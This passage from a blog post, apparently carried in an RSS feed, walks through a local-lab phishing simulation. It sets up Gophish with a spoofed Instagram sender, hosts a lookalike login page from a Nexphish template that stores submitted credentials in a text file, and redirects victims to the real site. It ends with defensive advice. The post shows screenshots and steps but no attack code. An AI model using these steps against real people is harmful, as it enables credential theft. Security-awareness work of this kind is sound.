HTML.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/637/0*ztjbxfiNoo0NjY9-.png" /></figure><p>Go to Gophish’s e-mail template tab and create a new e-mail template.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*1I5J26WVDzE9LJMw.png" /></figure><p>Paste this HTML code to HTML here, We just need to change text values maybe pictures and it depends on your skills. You need to put a link here for a phishing website. We are simulating so I have changed my Windows host file and added “www.instegram-secure-your-account-6wf35.com.tr&quot;. You can add files to your mail if you want.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*IIi33O911YUti_kZ.png" /></figure><p>I am running this website on my local network so I wrote my Kali’s ip because I will stream my website on it.</p><p>Save all of these settings and turn back to gophish settings.</p><p>Go to Sending Profiles and create a new profile.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Bgr2mM38N76IWyX6.png" /></figure><p>Enter the mail address that you want to show to the victim and you need to type your SMTP server address and username password if there is but in our lab, we don’t have a username password.</p><p>After all of this tiredness, you just need to create a user group add users to it and create a campaign.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/696/0*yIR18aF-KKJ9tLmf.png" /></figure><p>💡 You need to create a landing page too but we are not going to use it you need to leave it blank. If you don’t create an empty landing page gophish is not working on the campaign step.</p><p>Send a test mail and see what is going on :)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*jO0icvag5XLY8Qiy.png" /></figure><p>Now, we can send spoofed mail. It is time to prepare our phishing website.</p><p>I am going to do it an easy way and find a phishing website tool, we can use their templates of course. I will install Nexphish for this but I will just take its template.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/966/0*0o2zdNFsmk0H1PB3.png" /></figure><p>As you can see there are hidden folders, The “.Modules” folder has a lot of website templates and “login.php” files. When I inspected those files a little bit I noticed that they are just sending user credentials with POST protocol and saving them in the “usernames.txt” file in the existing folder.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1019/0*E5ipLhYbIMk40RNE.png" /></figure><p>Now we need to open our console here and publish this website with the code below.</p><p>Now we can access this website from Windows machines if we are in the same network.</p><p>Remember we typed something in the “hosts” file on the Windows machine, that was Kali’s IP and the website link of our website.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*woHsUo4lJ6g9nH8Q.png" /></figure><p>Let’s start the campaign and see if this phishing works.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*VNhIyP9KeMfHz2El.png" /></figure><p>This panel shows you all the things about the campaign.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*7lNPvfMV8LZdfjjl.png" /></figure><p>Hey! We have received a mail from security@mail.inst(e)gram.com :)</p><p>When we click the link.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*eAnNjSjDGY5-Red4.png" /></figure><p>When we enter our credentials (Not the real ones) it redirects us to a real Instagram page. We can check the “usernames.txt” file in the website folder and see the credentials.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/974/0*af7SiJwW0Knf5OY4.png" /></figure><h3>Conclusion</h3><blockquote><em>If you have recieved a mail like this and you need to change your password, open the browser and change your password manually, not with sent link and the most important thing, use two factor authentication. Two factor authentication is so hard to brake, of course nothing is impossible but you need to becareful and take as many precautions as you can.</em></blockquote><p>💡 I am waiting for your feedback about this blog post, please let me know If I have a mistake. Feel free to pull requests.</p><p><em>Originally published at http://github.com</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d937962168c" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>